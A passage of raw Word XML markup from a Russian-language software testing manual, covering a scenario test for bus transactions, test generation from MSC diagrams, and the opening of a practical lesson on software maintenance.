      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Сценарий: пользователь имеет две независимые нити управления, одна из которых отвечает за генерацию полных транзакций посредством </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DoTransaction</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, а другая – за сбор транзакций из адресной части и части данных, когда эта информация приходит из разных источников. Таким образом, вторая нитка использует вызовы к </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DoAddressTenure</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DoDataTenure</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Описание тестов: Вызвать </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DoAddressTenure</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> c адресом </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>А1</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, вызвать </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DoTransaction</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> с адресом </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>А2</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и данными </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>D2</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, вызвать </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DoDataTenure</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> с данными </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>D1</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Проверить последовательное появление на шине двух транзакций: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>{А1, D1}</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>{А2, D2}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">При выполнении этого теста было, в частности, обнаружено, что функция </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
        </w:rPr>
        <w:t>DoTransaction</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> была реализована через вызовы к </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
        </w:rPr>
        <w:t>DoAddressTenure</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
        </w:rPr>
        <w:t>DoDataTenure</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">, что приводило к появлению на шине транзакций вида </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
        </w:rPr>
        <w:t>{А1, D2}</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
        </w:rPr>
        <w:t>{А2, D1}</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>. Подобный дефект может быть обнаружен с большим трудом, если разрабатывать тесты, основываясь только на спецификации требований.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="173" w:name="sect13"/>
      <w:bookmarkEnd w:id="173"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ручная разработка тестов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Наиболее распространенным способом разработки тестов является создание тестового кода вручную. Это наиболее гибкий способ разработки тестов, однако характерная для него производительность труда инженеров-тестировщиков в создании тестового кода не намного выше скорости создания кода продукта, а объемы тестового кода на практике зачастую превышают объем кода продукта в 10 раз. Учитывая этот факт, в современной индустрии все больше склоняются к более интеллектуальным способам получения тестового кода, таким как использование специальных тестовых языков (скриптов) и генерации тестов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="174" w:name="sect14"/>
      <w:bookmarkEnd w:id="174"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Генерация тестов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>В настоящее время некоторые языки спецификаций, используемые для описания алгоритмов тестирования, могут быть использованы для генерации тестового кода. Рассмотрим генерацию кода из языка MSC. Тест, описанный выше, формализован на языке MSC (</w:t>
      </w:r>
      <w:hyperlink r:id="rId386" w:anchor="image.9.3" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>Рис. 3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">). Здесь каждая стрелка с пометкой </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
        </w:rPr>
        <w:t>DoTransaction</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
        </w:rPr>
        <w:t>DoAddressTenure</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
        </w:rPr>
        <w:t>DoDataTenure</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> представлет собой вызов соответствующей функции продукта с передачей параметров. Стрелка </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
        </w:rPr>
        <w:t>checkTr</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> соответствует проверке прохождения по шине транзакции с соответствующими параметрами. Каждая из стрелок диаграммы генератором тестов преобразуется в исполнимый код, при этом стрелкам, представляющим собой вызовы функций может соответствовать достаточно простой и маленький участок кода, вызывающий соответствующую функцию и проверяющий ее выходное значение на наличие ошибок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="175" w:name="image.9.3"/>
      <w:bookmarkEnd w:id="175"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1140150" cy="1189448"/>
            <wp:effectExtent l="19050" t="0" r="2850" b="0"/>
            <wp:docPr id="568" name="Рисунок 568" descr="http://www.intuit.ru/department/se/testing/9/9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www.intuit.ru/department/se/testing/9/9_3.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId387" r:link="rId388" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1140126" cy="1189423"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рис. 3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Формальная запись сценарного теста на MSC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Следует отметить, что стрелки, соответствующие проверке транзакций, могут после генерации преобразоваться в достаточно сложный код, который будет выполнять ожидание появления транзакции на шине в течение заданного при генерации времени - тайм-аута, проверять фазы транзакции и сверять вычисленные значения параметров с заданными эталонными значениями.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>В результате в рассматриваемом примере выигрыш от применения генерационного подхода достигается в основном за счет использования наглядного визуального представления тестов, что может быть нивелировано затратами на создание генерационного сценария на MSC.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Возможна куда более эффективная формализация MSC сценария для генерации тестов. </w:t>
      </w:r>
      <w:hyperlink r:id="rId389" w:anchor="image.9.4" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>Рис..4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> представляет другой способ формализации для теста, выполняющего те же самые проверки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="176" w:name="image.9.4"/>
      <w:bookmarkEnd w:id="176"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1284150" cy="1222480"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="569" name="Рисунок 569" descr="http://www.intuit.ru/department/se/testing/9/9_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www.intuit.ru/department/se/testing/9/9_4.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId390" r:link="rId391" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1284143" cy="1222473"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рис. 4.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Формальная запись сценарного теста на MSC с использованием параллелизма.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">В MSC на </w:t>
      </w:r>
      <w:hyperlink r:id="rId392" w:anchor="image.9.4" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>Рис. 4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> проверки транзакций сгруппированы с порождающими их вызовами в отдельные фрагменты, а параллелизм, используемый при исполнении фрагментов, задан через </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="texample"/>
        </w:rPr>
        <w:t>Par</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> – формальную конструкцию, применяемую для изображения параллелизма в языке MSC. При генерации тестов по диаграмме </w:t>
      </w:r>
      <w:hyperlink r:id="rId393" w:anchor="image.9.4" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>Рис. 4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> тестовый генератор перебирает все возможные и неповторяющиеся варианты вызова тестируемых функций, сохраняя при этом корректность порядка проверок, что в данном примере дает три сгенерированных теста. Несложно видеть, что затраты на создание диаграммы </w:t>
      </w:r>
      <w:hyperlink r:id="rId394" w:anchor="image.9.4" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>Рис. 4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> не сильно отличаются от затрат на диаграмму </w:t>
      </w:r>
      <w:hyperlink r:id="rId395" w:anchor="image.9.3" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>Рис..3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:t>, в то время как количество тестов увеличивается в три раза.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Таким образом, использование методики генерации тестового кода по формализованным MSC диаграммам позволяет значительно поднять производительность тестирования, а также преобразовать формализацию (кодировку) сценариев в достаточно интеллектуальную деятельность.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="177" w:name="_Toc26278739"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическое занятие № 20 </w:t>
      </w:r>
      <w:r w:rsidR="00517F15" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Обслуживание </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>программного обеспечения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="144"/>
      <w:bookmarkEnd w:id="145"/>
      <w:r w:rsidR="00431529" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> отраслевой направленности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="177"/>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> научиться решать проблемы настройки программного обеспечения</w:t>
      </w:r>
      <w:r w:rsidR="00B632E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> путем созадния</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> VHD</w:t>
      </w:r>
      <w:r w:rsidR="00B632E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>диска</w:t>
      </w:r>
      <w:r w:rsidR="00B632E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, с помощью </w:t>
      </w:r>
      <w:r w:rsidR="00B632E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Problem Steps Recorder</w:t>
      </w:r>
      <w:r w:rsidR="00F16A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/, </w:t>
      </w:r>
      <w:r w:rsidR="00F16A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>выполнять</w:t>
      </w:r>
      <w:r w:rsidR="00F16A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F16A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>анализ</w:t>
      </w:r>
      <w:r w:rsidR="00F16A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F16A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidR="00F16A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F16A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>помощью</w:t>
      </w:r>
      <w:r w:rsidR="00F16A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Application Compatibility Toolkit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">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5742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет</w:t>
      </w:r>
      <w:r w:rsidR="00B632E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> должен</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> содержат</w:t>
      </w:r>
      <w:r w:rsidR="00B632E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> рекомендации по установке и примерный текст консультации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
